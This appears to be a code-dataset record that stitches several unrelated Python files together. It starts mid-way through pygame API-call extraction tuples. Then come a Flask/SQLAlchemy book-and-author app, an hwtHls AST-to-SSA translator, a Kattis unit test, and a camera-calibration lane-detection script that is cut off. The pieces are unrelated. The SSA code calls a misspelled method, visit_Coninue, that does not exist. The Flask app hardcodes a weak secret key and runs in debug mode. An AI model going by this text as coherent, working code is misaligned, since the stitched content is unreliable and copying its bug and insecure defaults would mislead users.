'import pygame\n'), ((8732, 8753), 'pygame.key.get_mods', 'pygame.key.get_mods', ([], {}), '()\n', (8751, 8753), False, 'import pygame\n'), ((5230, 5289), 'pygame.Rect', 'pygame.Rect', (['(0)', '(0)', 'progress_bar_length', 'PROGRESS_BAR_HEIGHT'], {}), '(0, 0, progress_bar_length, PROGRESS_BAR_HEIGHT)\n', (5241, 5289), False, 'import pygame\n'), ((5356, 5538), 'pygame.draw.line', 'pygame.draw.line', (['self._surface', 'grid_color', '(self._left + x * self._grid_size, self._top)', '(self._left + x * self._grid_size, self._top + self._map_size * self._grid_size\n )'], {}), '(self._surface, grid_color, (self._left + x * self.\n _grid_size, self._top), (self._left + x * self._grid_size, self._top + \n self._map_size * self._grid_size))\n', (5372, 5538), False, 'import pygame\n'), ((5693, 5874), 'pygame.draw.line', 'pygame.draw.line', (['self._surface', 'grid_color', '(self._left, self._top + y * self._grid_size)', '(self._left + self._map_size * self._grid_size, self._top + y * self._grid_size\n )'], {}), '(self._surface, grid_color, (self._left, self._top + y *\n self._grid_size), (self._left + self._map_size * self._grid_size, self.\n _top + y * self._grid_size))\n', (5709, 5874), False, 'import pygame\n'), ((7451, 7642), 'pygame.draw.circle', 'pygame.draw.circle', (['self._surface', 'color', '(self._left + pos[0] * self._grid_size + self._grid_size // 2 + 1, self.\n _top + pos[1] * self._grid_size + self._grid_size // 2 + 1)', 'radius'], {}), '(self._surface, color, (self._left + pos[0] * self.\n _grid_size + self._grid_size // 2 + 1, self._top + pos[1] * self.\n _grid_size + self._grid_size // 2 + 1), radius)\n', (7469, 7642), False, 'import pygame\n'), ((2439, 2466), 'pygame.image.load', 'pygame.image.load', (['img_file'], {}), '(img_file)\n', (2456, 2466), False, 'import pygame\n'), ((4288, 4318), 'random.choice', 'random.choice', (['self._food_imgs'], {}), '(self._food_imgs)\n', (4301, 4318), False, 'import random\n'), ((3933, 3958), 'pygame.mixer.music.stop', 'pygame.mixer.music.stop', ([], {}), '()\n', (3956, 3958), False, 'import pygame\n'), ((4004, 4061), 'subprocess.Popen', 'subprocess.Popen', (["['vlc', '-f', SELF_DIR + '/ending.mp4']"], {}), "(['vlc', '-f', SELF_DIR + '/ending.mp4'])\n", (4020, 4061), False, 'import subprocess\n'), ((6207, 6407), 'pygame.draw.line', 'pygame.draw.line', (['self._surface', 'wall_color', '(self._left + x * self._grid_size, self._top + y * self._grid_size)', '(self._left + x * self._grid_size, self._top + (y + 1) * self._grid_size)', '(3)'], {}), '(self._surface, wall_color, (self._left + x * self.\n _grid_size, self._top + y * self._grid_size), (self._left + x * self.\n _grid_size, self._top + (y + 1) * self._grid_size), 3)\n', (6223, 6407), False, 'import pygame\n'), ((6782, 6981), 'pygame.draw.line', 'pygame.draw.line', (['self._surface', 'wall_color', '(self._left + x * self._grid_size, self._top + y * self._grid_size)', '(self._left + (x + 1) * self._grid_size, self._top + y * self._grid_size)', '(3)'], {}), '(self._surface, wall_color, (self._left + x * self.\n _grid_size, self._top + y * self._grid_size), (self._left + (x + 1) *\n self._grid_size, self._top + y * self._grid_size), 3)\n', (6798, 6981), False, 'import pygame\n')] |
from flask import Flask, render_template, flash,request,redirect,url_for
from flask_sqlalchemy import SQLAlchemy
from flaskmodel.config import *
from flask_wtf import FlaskForm
from wtforms import StringField,SubmitField
from wtforms.validators import DataRequired
app = Flask(__name__)
# 创建数据库连接
db = SQLAlchemy(app)
'''
1. 配置数据库
a. 导入Sqlalchemy扩展
b. 创建db对象,并配置参数
c. 终端创建数据库
2. 添加书和作者模型
a. 继承db.Model
b. __tablename__:表名
c. 设置字段名
d. 设置引用关系
3. 添加数据
4. 使用模板显示数据库查询的数据
a. 在模板中for循环就行了(我自己试的时候想在py中做,但是没成功)
5. 使用WTF显示表单
a. 自定义表单类
b. 模板中显示
c. secret_key / 编码 / csrf_token的问题
6. 实现相关的增删逻辑
a. 增加数据
b. 删除书籍:网页中删除,点击需要发送数据的ID给删除书籍的路由,路由需要接收参数(for else / redirect / url_for 的使用)
c. 删除作者
'''
# 配置数据库地址
app.config['SQLALCHEMY_DATABASE_URI'] = '{}+{}://{}:{}@{}:{}/{}?charset=utf8'.format(DIALECT,DRIVER,USERNAME,PASSWORD,HOST,PORT,DATABASE)
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.secret_key = 'hbb'
# 自定义表单类
class AuthorForm(FlaskForm):
author = StringField('作者',validators=[DataRequired()])
book = StringField('书籍',validators=[DataRequired()])
submit = SubmitField('提交')
# 添加书和作者模型
class Author(db.Model):
# 表名
__tablename__ = 'authors'
# 字段
id = db.Column(db.Integer,primary_key = True)
author_name = db.Column(db.String(16),unique = True)
books = db.relationship('Book',backref='author')
# 关系引用
# books = db.relationship()
def __repr__ (self):
return '<Author: %r>' % self.author_name
class Book(db.Model):
__tablename__ = 'books'
id = db.Column(db.Integer,primary_key=True)
book_name = db.Column(db.String(255),unique=True)
author_id = db.Column(db.Integer, db.ForeignKey('authors.id'))
def __repr__ (self):
return '<Book: %r %r>' % (self.book_name,self.author_id)
#删除作者(记得把书也要删掉)
@app.route('/delete_author/<author_id>')
def delete_author(author_id):
author = Author.query.get(author_id)
if author:
try:
Book.query.filter_by(author_id = author_id).delete()
db.session.delete(author)
db.session.commit()
except Exception as e:
flash('删除作者出错')
db.session.rollback()
else:
flash('作者找不到')
return redirect(url_for('index'))
@app.route('/delete_book/<book_id>')
def delete_book(book_id):
book = Book.query.get(book_id)
if book:
try:
db.session.delete(book)
db.session.commit()
except Exception as e:
flash('删除书籍出错')
db.session.rollback()
else:
flash('书籍找不到')
return redirect(url_for('index'))
@app.route('/',methods = ['GET','POST'])
def index():
# 创建自定义的表单
author_form = AuthorForm()
# 查询所有作者信息,让信息传递给模板
'''
验证逻辑:
1. 调用WTF的函数实现验证
2. 验证通过获取数据
3. 判断做作者是否存在
4. 如果作者存在,判断书籍是否存在,没有重复书籍就添加数据,如果重复就提示错误
5. 如果作者不存在,添加作者与书籍
6. 验证不通过就提示错误
'''
# 1. 调用WTF的函数实现验证
if author_form.validate_on_submit():
# 2. 验证通过获取数据
author_name = author_form.author.data
book_name = author_form.book.data
# 3. 判断作者是否存在
author = Author.query.filter_by(author_name=author_name).first()
book = Book.query.filter_by(book_name=book_name).first()
# 4. 如果作者存在
if author:
# 判断作者是否存在,没有重复书籍就添加数据,如果重复就提示错误
if book:
# 有同名书籍就提示
flash('已存在同名同作者书籍')
else:
# 没有同名书籍,就添加数据
try:
new_book = Book(book_name = book_name,author_id = author.id)
db.session.add(new_book)
db.session.commit()
except Exception as e:
print(e)
flash('有作者时添加书籍失败')
db.session.rollback() # 如果添加失败就回滚
else:
# 如果作者不存在,判断书籍是否存在
if book:
# 有同名书籍就提示
flash('已存在相同的书籍')
else:
# 没有同名书籍就添加数据
try:
new_author = Author(author_name=author_name)
db.session.add(new_author)
db.session.commit()
new_book = Book(book_name=book_name, author_id=new_author.id)
db.session.add(new_book)
db.session.commit()
except Exception as e:
print(e)
flash('无作者时添加书籍失败')
db.session.rollback() # 如果添加失败就回滚
else:
if request.method == 'POST':
flash('参数不全!')
authors = Author.query.all()
return render_template('books.html',authors = authors,form = author_form)
if __name__ == '__main__':
# db.create_all()
# db.drop_all()
# 添加数据
# au1 = Author(author_name = 'hbb')
# au2 = Author(author_name = 'ry')
# au3 = Author(author_name = 'rmf')
# db.session.add_all([au1,au2,au3])
# db.session.commit()
#
# bk1 = Book(book_name = '量子史话',author_id = au1.id)
# bk2 = Book(book_name = '我们仨',author_id = au1.id)
# bk3 = Book(book_name = '管理学',author_id = au2.id)
# bk4 = Book(book_name = '玩具的学与玩',author_id = au3.id)
# bk5 = Book(book_name = '教养的迷思',author_id = au3.id)
# db.session.add_all([bk1,bk2,bk3,bk4,bk5])
# db.session.commit()
app.run(debug=True)
| [
"flask.render_template",
"flask.flash",
"flask.Flask",
"wtforms.SubmitField",
"flask.url_for",
"flask_sqlalchemy.SQLAlchemy",
"wtforms.validators.DataRequired"
] | [((272, 287), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (277, 287), False, 'from flask import Flask, render_template, flash, request, redirect, url_for\n'), ((303, 318), 'flask_sqlalchemy.SQLAlchemy', 'SQLAlchemy', (['app'], {}), '(app)\n', (313, 318), False, 'from flask_sqlalchemy import SQLAlchemy\n'), ((1133, 1150), 'wtforms.SubmitField', 'SubmitField', (['"""提交"""'], {}), "('提交')\n", (1144, 1150), False, 'from wtforms import StringField, SubmitField\n'), ((4623, 4687), 'flask.render_template', 'render_template', (['"""books.html"""'], {'authors': 'authors', 'form': 'author_form'}), "('books.html', authors=authors, form=author_form)\n", (4638, 4687), False, 'from flask import Flask, render_template, flash, request, redirect, url_for\n'), ((2224, 2238), 'flask.flash', 'flash', (['"""作者找不到"""'], {}), "('作者找不到')\n", (2229, 2238), False, 'from flask import Flask, render_template, flash, request, redirect, url_for\n'), ((2259, 2275), 'flask.url_for', 'url_for', (['"""index"""'], {}), "('index')\n", (2266, 2275), False, 'from flask import Flask, render_template, flash, request, redirect, url_for\n'), ((2582, 2596), 'flask.flash', 'flash', (['"""书籍找不到"""'], {}), "('书籍找不到')\n", (2587, 2596), False, 'from flask import Flask, render_template, flash, request, redirect, url_for\n'), ((2617, 2633), 'flask.url_for', 'url_for', (['"""index"""'], {}), "('index')\n", (2624, 2633), False, 'from flask import Flask, render_template, flash, request, redirect, url_for\n'), ((4563, 4577), 'flask.flash', 'flash', (['"""参数不全!"""'], {}), "('参数不全!')\n", (4568, 4577), False, 'from flask import Flask, render_template, flash, request, redirect, url_for\n'), ((1050, 1064), 'wtforms.validators.DataRequired', 'DataRequired', ([], {}), '()\n', (1062, 1064), False, 'from wtforms.validators import DataRequired\n'), ((1107, 1121), 'wtforms.validators.DataRequired', 'DataRequired', ([], {}), '()\n', (1119, 1121), False, 'from wtforms.validators import DataRequired\n'), ((2156, 2171), 'flask.flash', 'flash', (['"""删除作者出错"""'], {}), "('删除作者出错')\n", (2161, 2171), False, 'from flask import Flask, render_template, flash, request, redirect, url_for\n'), ((2514, 2529), 'flask.flash', 'flash', (['"""删除书籍出错"""'], {}), "('删除书籍出错')\n", (2519, 2529), False, 'from flask import Flask, render_template, flash, request, redirect, url_for\n'), ((3408, 3427), 'flask.flash', 'flash', (['"""已存在同名同作者书籍"""'], {}), "('已存在同名同作者书籍')\n", (3413, 3427), False, 'from flask import Flask, render_template, flash, request, redirect, url_for\n'), ((3935, 3952), 'flask.flash', 'flash', (['"""已存在相同的书籍"""'], {}), "('已存在相同的书籍')\n", (3940, 3952), False, 'from flask import Flask, render_template, flash, request, redirect, url_for\n'), ((3752, 3771), 'flask.flash', 'flash', (['"""有作者时添加书籍失败"""'], {}), "('有作者时添加书籍失败')\n", (3757, 3771), False, 'from flask import Flask, render_template, flash, request, redirect, url_for\n'), ((4429, 4448), 'flask.flash', 'flash', (['"""无作者时添加书籍失败"""'], {}), "('无作者时添加书籍失败')\n", (4434, 4448), False, 'from flask import Flask, render_template, flash, request, redirect, url_for\n')] |
from typing import Union, List, Optional, Tuple, Set
from hwt.hdl.operator import Operator
from hwt.hdl.operatorDefs import AllOps
from hwt.hdl.portItem import HdlPortItem
from hwt.hdl.statements.assignmentContainer import HdlAssignmentContainer
from hwt.hdl.statements.codeBlockContainer import HdlStmCodeBlockContainer
from hwt.hdl.statements.ifContainter import IfContainer
from hwt.hdl.value import HValue
from hwt.synthesizer.rtlLevel.rtlSignal import RtlSignal
from hwt.synthesizer.rtlLevel.signalUtils.exceptions import SignalDriverErr
from hwtHls.hlsStreamProc.statements import HlsStreamProcStm, HlsStreamProcWhile, \
HlsStreamProcWrite, HlsStreamProcRead, HlsStreamProcCodeBlock, \
HlsStreamProcIf, HlsStreamProcFor, HlsStreamProcContinue, HlsStreamProcBreak
from hwtHls.ssa.basicBlock import SsaBasicBlock
from hwtHls.ssa.context import SsaContext
from hwtHls.ssa.instr import SsaInstr, SsaInstrBranch
from hwtHls.ssa.translation.fromAst.memorySSAUpdater import MemorySSAUpdater
from hwtHls.ssa.value import SsaValue
AnyStm = Union[HdlAssignmentContainer, HlsStreamProcStm]
class SsaInstrBranchUnreachable(SsaInstrBranch):
def addTarget(self, cond:Optional[SsaValue], target:"SsaBasicBlock"):
pass
class SsaBasicBlockUnreachable(SsaBasicBlock):
def __init__(self, ctx: SsaContext, label:str):
SsaBasicBlock.__init__(self, ctx, label)
self.successors = SsaInstrBranchUnreachable(self)
class AstToSsa():
"""
* <NAME>, <NAME>, <NAME>, <NAME>, <NAME>, and <NAME>. 2013.
Simple and efficient construction of static single assignment form.
In Proceedings of the 22nd international conference on Compiler Construction (CC'13).
Springer-Verlag, <NAME>, 102–122. DOI:https://doi.org/10.1007/978-3-642-37051-9_6
* avoids computation of dominance or iterated DF
* works directly on AST (avoids CFG)
:see: https://github.com/lohner/FormalSSA
:note: new statements do generate a new block if this statement is not a loop the bloc is sealed.
If statement is loop the first block is sealed once all jumps from loop end are resolved.
Once the block is sealed the arguments for all phi functions is resolved recursively
and redundant phis are reduced.
:see: http://dev.stephendiehl.com/numpile/
:ivar start: basic block where the program begins
:ivar m_ssa_u: object which is used to track variable usage a to construct SsaPhi for SSA normal form
:ivar _continue_target: list of basic blocks where code should jump on continue statement
:ivar _break_target: list of basic blocks where code should jump on break statement
:ivar _loop_stack: list of loop where the AST visitor actually is to resolve
the continue/break and loop association. The record is a tuple (loop statement, entry block, list of blocks ending with break).
The blocks ending with break will have its breanch destination assigned after the loop is processed (in loop parsing fn.).
"""
def __init__(self, ssaCtx: SsaContext, startBlockName:str, original_code_for_debug: Optional[HlsStreamProcCodeBlock]):
self.ssaCtx = ssaCtx
self.start = SsaBasicBlock(ssaCtx, startBlockName)
self.m_ssa_u = MemorySSAUpdater(self._onBlockReduce, self.visit_expr)
# all predecesors known (because this is an entry point)
self._onAllPredecsKnown(self.start)
self._continue_target: List[SsaBasicBlock] = []
self._break_target: List[SsaBasicBlock] = []
self.original_code_for_debug = original_code_for_debug
self._loop_stack: List[Tuple[HlsStreamProcWhile, SsaBasicBlock, List[SsaBasicBlock]]] = []
def _onBlockReduce(self, block: SsaBasicBlock, replacement: SsaBasicBlock):
if block is self.start:
self.start = replacement
@staticmethod
def _addNewTargetBb(predecessor: SsaBasicBlock, cond: Optional[RtlSignal], label: str, origin) -> SsaBasicBlock:
new_block = SsaBasicBlock(predecessor.ctx, label)
if origin is not None:
new_block.origins.append(origin)
predecessor.successors.addTarget(cond, new_block)
return new_block
def _onAllPredecsKnown(self, block: SsaBasicBlock):
self.m_ssa_u.sealBlock(block)
def visit_top_CodeBlock(self, obj: HdlStmCodeBlockContainer) -> SsaBasicBlock:
block = self.visit_CodeBlock(self.start, obj)
self._onAllPredecsKnown(block)
return block
def visit_CodeBlock(self, block: SsaBasicBlock, obj: HdlStmCodeBlockContainer) -> SsaBasicBlock:
return self.visit_CodeBlock_list(block, obj.statements)
def visit_CodeBlock_list(self, block: SsaBasicBlock, obj: List[AnyStm]) -> SsaBasicBlock:
for o in obj:
if isinstance(o, HdlAssignmentContainer):
block = self.visit_Assignment(block, o)
elif isinstance(o, HlsStreamProcWrite):
block = self.visit_Write(block, o)
elif isinstance(o, HlsStreamProcWhile):
block = self.visit_While(block, o)
elif isinstance(o, HlsStreamProcFor):
block = self.visit_For(block, o)
elif isinstance(o, (HlsStreamProcIf, IfContainer)):
block = self.visit_If(block, o)
elif isinstance(o, HlsStreamProcRead):
block, _ = self.visit_expr(block, o)
elif isinstance(o, HlsStreamProcBreak):
block = self.visit_Break(block, o)
elif isinstance(o, HlsStreamProcContinue):
block = self.visit_Coninue(block, o)
else:
raise NotImplementedError(o)
return block
def visit_expr(self, block: SsaBasicBlock, var: Union[RtlSignal, HValue]) -> Tuple[SsaBasicBlock, Union[SsaValue, HValue]]:
if isinstance(var, RtlSignal):
try:
op = var.singleDriver()
except SignalDriverErr:
op = None
if op is None or not isinstance(op, Operator):
if isinstance(op, HdlPortItem):
raise NotImplementedError(op)
elif isinstance(op, HlsStreamProcRead):
if op.block is None:
block.appendInstruction(op)
# HlsStreamProcRead is a SsaValue and thus represents "variable"
self.m_ssa_u.writeVariable(var, (), block, op)
return block, op
elif isinstance(op, (HlsStreamProcBreak, HlsStreamProcContinue)):
raise NotImplementedError()
else:
return block, self.m_ssa_u.readVariable(var, block)
if op.operator in (AllOps.BitsAsVec, AllOps.BitsAsUnsigned) and not var._dtype.signed:
# skip implicit conversions
assert len(op.operands) == 1
return self.visit_expr(block, op.operands[0])
ops = []
for o in op.operands:
block, _o = self.visit_expr(block, o)
ops.append(_o)
self.m_ssa_u.writeVariable(var, (), block, tuple(ops))
var = SsaInstr(block.ctx, var._dtype, op.operator, ops, origin=var)
block.appendInstruction(var)
# we know for sure that this in in this block that is why we do not need to use readVariable
return block, var
elif isinstance(var, HValue):
return block, var
else:
if isinstance(var, HlsStreamProcRead):
if var.block is None:
block.appendInstruction(var)
# HlsStreamProcRead is a SsaValue and thus represents "variable"
self.m_ssa_u.writeVariable(var._sig, (), block, var)
var = var._sig
return block, self.m_ssa_u.readVariable(var, block)
def visit_For(self, block: SsaBasicBlock, o: HlsStreamProcFor) -> SsaBasicBlock:
block = self.visit_CodeBlock_list(block, o.init)
return self.visit_While(block, HlsStreamProcWhile(o.parent, o.cond, o.body + o.step))
def visit_While(self, block: SsaBasicBlock, o: HlsStreamProcWhile) -> SsaBasicBlock:
if isinstance(o.cond, HValue):
if o.cond:
# while True
cond_block = self._addNewTargetBb(block, None, f"{block.label:s}_whC", o)
self._loop_stack.append((o, cond_block, []))
body_block = self._addNewTargetBb(cond_block, None, f"{block.label:s}_wh", o)
self._onAllPredecsKnown(body_block)
body_block = self.visit_CodeBlock_list(body_block, o.body)
body_block.successors.addTarget(None, cond_block)
self._onAllPredecsKnown(cond_block)
_o, _, breaks = self._loop_stack.pop()
assert _o is o, (_o, o, "Must be record of this loop")
if breaks:
end_block = SsaBasicBlock(block.ctx, f"{block.label:s}_whEnd")
for b in breaks:
b: SsaBasicBlock
b.successors.addTarget(None, end_block)
else:
end_block = SsaBasicBlockUnreachable(block.ctx, f"{block.label:s}_whUnreachable")
self._onAllPredecsKnown(end_block)
else:
# while False
end_block = block
else:
#
cond_block_orig = self._addNewTargetBb(block, None, f"{block.label:s}_whC", o)
c = o.cond
if c._dtype.bit_length() > 1:
c = c != 0
else:
c = c._isOn()
cond_block, c = self.visit_expr(cond_block_orig, c)
cond_block.origins.append(o)
self._loop_stack.append((o, cond_block, []))
body_block = self._addNewTargetBb(cond_block, c, f"{block.label:s}_wh", o)
self._onAllPredecsKnown(body_block)
end_block = self._addNewTargetBb(cond_block, None, f"{block.label:s}_whE", o)
body_block = self.visit_CodeBlock_list(body_block, o.body)
body_block.successors.addTarget(None, cond_block)
self._onAllPredecsKnown(cond_block_orig)
_o, _, breaks = self._loop_stack.pop()
assert _o is o, (_o, o, "Must be record of this loop")
if breaks:
for b in breaks:
b: SsaBasicBlock
b.successors.addTarget(None, end_block)
self._onAllPredecsKnown(end_block)
return end_block
def visit_Continue(self, block: SsaBasicBlock, o: HlsStreamProcContinue) -> SsaBasicBlock:
assert self._loop_stack, (o, "Must be in loop")
_, loop_entry, _ = self._loop_stack[-1]
block.successors.addTarget(None, loop_entry)
return self._make_Unreachable(block.ctx, f"{block.label:s}_conUnreachable")
def _make_Unreachable(self, ctx:SsaContext, label:str):
end_block = SsaBasicBlockUnreachable(ctx, label)
self._onAllPredecsKnown(end_block)
return end_block
def visit_Break(self, block: SsaBasicBlock, o: HlsStreamProcContinue) -> SsaBasicBlock:
assert self._loop_stack, (o, "Must be in loop")
_, _, break_blocks = self._loop_stack[-1]
break_blocks.append(block)
return self._make_Unreachable(block.ctx, f"{block.label:s}_breUnreachable")
def visit_If_branch(self, origin: IfContainer, label: str, cond_block: SsaBasicBlock,
end_if_block: SsaBasicBlock, cond: Optional[SsaValue], caseStatements: list):
if caseStatements:
# new top block for the branch
block = self._addNewTargetBb(cond_block, cond, label, origin)
self._onAllPredecsKnown(block)
# load body of the branch
block = self.visit_CodeBlock_list(block, caseStatements)
# add jump from the end of the branch to end of if-then-else
block.successors.addTarget(None, end_if_block)
# now nothing can jump on start or end of the branch, end_if_block will be only successor
else:
cond_block.successors.addTarget(cond, end_if_block)
def visit_If(self, block: SsaBasicBlock, o: HlsStreamProcIf) -> SsaBasicBlock:
cond_block = self._addNewTargetBb(block, None, f"{block.label:s}_IfC", o)
self._onAllPredecsKnown(cond_block)
cond_block, cond = self.visit_expr(cond_block, o.cond)
end_if_block = SsaBasicBlock(self.ssaCtx, f"{block.label:s}_IfE")
self.visit_If_branch(o, f"{block.label:s}_If", cond_block, end_if_block, cond, o.ifTrue)
for i, (c, stms) in enumerate(o.elIfs):
cond_block, cond = self.visit_expr(cond_block, c)
self.visit_If_branch(o, f"{block.label:s}_Elif{i:d}", cond_block, end_if_block, cond, stms)
self.visit_If_branch(o, f"{block.label:s}_Else", cond_block, end_if_block, None, o.ifFalse)
self._onAllPredecsKnown(end_if_block)
return end_if_block
def visit_Assignment(self, block: SsaBasicBlock, o: HdlAssignmentContainer) -> SsaBasicBlock:
block, src = self.visit_expr(block, o.src)
block.origins.append(o)
# this may result in:
# * store instruction
# * just the registration of the varialbe for the symbol
# * only a segment in bit vector can be assigned, this result in the assignment of the concatenation of previous and new value
self.m_ssa_u.writeVariable(o.dst, o.indexes, block, src)
# ld = SsaInstr(o.dst, src)
# block.appendInstruction(ld)
# if isinstance(src, SsaValue):
# src.users.append(ld)
return block
def visit_Write(self, block: SsaBasicBlock, o: HlsStreamProcWrite) -> SsaBasicBlock:
block, src = self.visit_expr(block, o.getSrc())
o.operands = (src,)
block.appendInstruction(o)
block.origins.append(o)
if isinstance(src, SsaValue):
src.users.append(o)
return block
def finalize(self):
assert not self.m_ssa_u.incompletePhis, self.m_ssa_u.incompletePhis
| [
"hwtHls.ssa.basicBlock.SsaBasicBlock.__init__",
"hwtHls.ssa.basicBlock.SsaBasicBlock",
"hwtHls.ssa.instr.SsaInstr",
"hwtHls.hlsStreamProc.statements.HlsStreamProcWhile",
"hwtHls.ssa.translation.fromAst.memorySSAUpdater.MemorySSAUpdater"
] | [((1344, 1384), 'hwtHls.ssa.basicBlock.SsaBasicBlock.__init__', 'SsaBasicBlock.__init__', (['self', 'ctx', 'label'], {}), '(self, ctx, label)\n', (1366, 1384), False, 'from hwtHls.ssa.basicBlock import SsaBasicBlock\n'), ((3187, 3224), 'hwtHls.ssa.basicBlock.SsaBasicBlock', 'SsaBasicBlock', (['ssaCtx', 'startBlockName'], {}), '(ssaCtx, startBlockName)\n', (3200, 3224), False, 'from hwtHls.ssa.basicBlock import SsaBasicBlock\n'), ((3248, 3302), 'hwtHls.ssa.translation.fromAst.memorySSAUpdater.MemorySSAUpdater', 'MemorySSAUpdater', (['self._onBlockReduce', 'self.visit_expr'], {}), '(self._onBlockReduce, self.visit_expr)\n', (3264, 3302), False, 'from hwtHls.ssa.translation.fromAst.memorySSAUpdater import MemorySSAUpdater\n'), ((3989, 4026), 'hwtHls.ssa.basicBlock.SsaBasicBlock', 'SsaBasicBlock', (['predecessor.ctx', 'label'], {}), '(predecessor.ctx, label)\n', (4002, 4026), False, 'from hwtHls.ssa.basicBlock import SsaBasicBlock\n'), ((12655, 12705), 'hwtHls.ssa.basicBlock.SsaBasicBlock', 'SsaBasicBlock', (['self.ssaCtx', 'f"""{block.label:s}_IfE"""'], {}), "(self.ssaCtx, f'{block.label:s}_IfE')\n", (12668, 12705), False, 'from hwtHls.ssa.basicBlock import SsaBasicBlock\n'), ((7182, 7243), 'hwtHls.ssa.instr.SsaInstr', 'SsaInstr', (['block.ctx', 'var._dtype', 'op.operator', 'ops'], {'origin': 'var'}), '(block.ctx, var._dtype, op.operator, ops, origin=var)\n', (7190, 7243), False, 'from hwtHls.ssa.instr import SsaInstr, SsaInstrBranch\n'), ((8077, 8130), 'hwtHls.hlsStreamProc.statements.HlsStreamProcWhile', 'HlsStreamProcWhile', (['o.parent', 'o.cond', '(o.body + o.step)'], {}), '(o.parent, o.cond, o.body + o.step)\n', (8095, 8130), False, 'from hwtHls.hlsStreamProc.statements import HlsStreamProcStm, HlsStreamProcWhile, HlsStreamProcWrite, HlsStreamProcRead, HlsStreamProcCodeBlock, HlsStreamProcIf, HlsStreamProcFor, HlsStreamProcContinue, HlsStreamProcBreak\n'), ((9006, 9056), 'hwtHls.ssa.basicBlock.SsaBasicBlock', 'SsaBasicBlock', (['block.ctx', 'f"""{block.label:s}_whEnd"""'], {}), "(block.ctx, f'{block.label:s}_whEnd')\n", (9019, 9056), False, 'from hwtHls.ssa.basicBlock import SsaBasicBlock\n')] |
import io
import unittest
from unittest.mock import patch
from kattis import k_apaxiaaans
###############################################################################
class SampleInput(unittest.TestCase):
'''Problem statement sample inputs and outputs'''
def test_sample_input_1(self):
'''Run and assert problem statement sample 1 input and output.'''
inputs = 'robert\n'
outputs = 'robert\n'
with patch('sys.stdin', io.StringIO(inputs)) as stdin,\
patch('sys.stdout', new_callable=io.StringIO) as stdout:
k_apaxiaaans.main()
self.assertEqual(stdout.getvalue(), outputs)
self.assertEqual(stdin.read(), '')
def test_sample_input_2(self):
'''Run and assert problem statement sample 2 input and output.'''
inputs = 'rooobert\n'
outputs = 'robert\n'
with patch('sys.stdin', io.StringIO(inputs)) as stdin,\
patch('sys.stdout', new_callable=io.StringIO) as stdout:
k_apaxiaaans.main()
self.assertEqual(stdout.getvalue(), outputs)
self.assertEqual(stdin.read(), '')
def test_sample_input_3(self):
'''Run and assert problem statement sample 3 input and output.'''
inputs = 'roooooobertapalaxxxxios\n'
outputs = 'robertapalaxios\n'
with patch('sys.stdin', io.StringIO(inputs)) as stdin,\
patch('sys.stdout', new_callable=io.StringIO) as stdout:
k_apaxiaaans.main()
self.assertEqual(stdout.getvalue(), outputs)
self.assertEqual(stdin.read(), '')
###############################################################################
if __name__ == '__main__':
unittest.main()
| [
"unittest.main",
"kattis.k_apaxiaaans.main",
"io.StringIO",
"unittest.mock.patch"
] | [((1719, 1734), 'unittest.main', 'unittest.main', ([], {}), '()\n', (1732, 1734), False, 'import unittest\n'), ((509, 554), 'unittest.mock.patch', 'patch', (['"""sys.stdout"""'], {'new_callable': 'io.StringIO'}), "('sys.stdout', new_callable=io.StringIO)\n", (514, 554), False, 'from unittest.mock import patch\n'), ((578, 597), 'kattis.k_apaxiaaans.main', 'k_apaxiaaans.main', ([], {}), '()\n', (595, 597), False, 'from kattis import k_apaxiaaans\n'), ((949, 994), 'unittest.mock.patch', 'patch', (['"""sys.stdout"""'], {'new_callable': 'io.StringIO'}), "('sys.stdout', new_callable=io.StringIO)\n", (954, 994), False, 'from unittest.mock import patch\n'), ((1018, 1037), 'kattis.k_apaxiaaans.main', 'k_apaxiaaans.main', ([], {}), '()\n', (1035, 1037), False, 'from kattis import k_apaxiaaans\n'), ((1413, 1458), 'unittest.mock.patch', 'patch', (['"""sys.stdout"""'], {'new_callable': 'io.StringIO'}), "('sys.stdout', new_callable=io.StringIO)\n", (1418, 1458), False, 'from unittest.mock import patch\n'), ((1482, 1501), 'kattis.k_apaxiaaans.main', 'k_apaxiaaans.main', ([], {}), '()\n', (1499, 1501), False, 'from kattis import k_apaxiaaans\n'), ((464, 483), 'io.StringIO', 'io.StringIO', (['inputs'], {}), '(inputs)\n', (475, 483), False, 'import io\n'), ((904, 923), 'io.StringIO', 'io.StringIO', (['inputs'], {}), '(inputs)\n', (915, 923), False, 'import io\n'), ((1368, 1387), 'io.StringIO', 'io.StringIO', (['inputs'], {}), '(inputs)\n', (1379, 1387), False, 'import io\n')] |
"""
# !/usr/bin/env python
# -*- coding: utf-8 -*-
@Time : 2022/2/24 20:12
@Author : <EMAIL>
@ProjectName : udacity-program_self_driving_car_engineer_v1.0_source.0
@File : full_pipeline.py
"""
import numpy as np
import cv2
import os
import matplotlib.image as mpimg
import matplotlib.pyplot as plt
import glob
from moviepy.editor import VideoFileClip
# Load in the chessboard calibration images to a list
cal_image_loc = glob.glob('camera_cal/calibration*.jpg')
# Prepare object points, like (0,0,0), (1,0,0), (2,0,0) ....,(6,5,0)
objp = np.zeros((6 * 9, 3), np.float32)
objp[:, :2] = np.mgrid[0:9, 0:6].T.reshape(-1, 2)
# Arrays for later storing object points and image points
obj_points = [] # 3d points in real world space
img_points = [] # 2d points in image plane.
# Make a list of calibration images
calibration_images = []
for im in cal_image_loc:
img = mpimg.imread(im)
calibration_images.append(img)
verbose = False
# Iterate through images for their points
for image in calibration_images:
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# Find the chessboard corners
pattern_found, corners = cv2.findChessboardCorners(gray, (9, 6), None)
if pattern_found is True:
obj_points.append(objp)
img_points.append(corners)
if verbose:
# Draw and display the corners
img = cv2.drawChessboardCorners(image, (9, 6), corners, pattern_found)
cv2.imshow('img', img)
cv2.waitKey(500)
if verbose:
cv2.destroyAllWindows()
# Returns camera calibration
ret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(obj_points, img_points, gray.shape[::-1], None, None)
class Left_Line():
"""
the left line
"""
def __init__(self):
# was the line detected in the last iteration?
self.detected = False
# recent polynomial coefficients
self.recent_fit = []
# polynomial coefficients averaged over the last n iterations
self.best_fit = None
# polynomial coefficients for the most recent fit
self.current_fit = [np.array([False])]
# difference in fit coefficients between last and new fits
self.diffs = np.array([0, 0, 0], dtype='float')
# x values for detected line pixels
self.allx = None
# y values for detected line pixels
self.ally = None
# counter to reset after 5 iterations if issues arise
self.counter = 0
class Right_Line():
"""
the right line
"""
def __init__(self):
# was the line detected in the last iteration?
self.detected = False
# recent polynomial coefficients
self.recent_fit = []
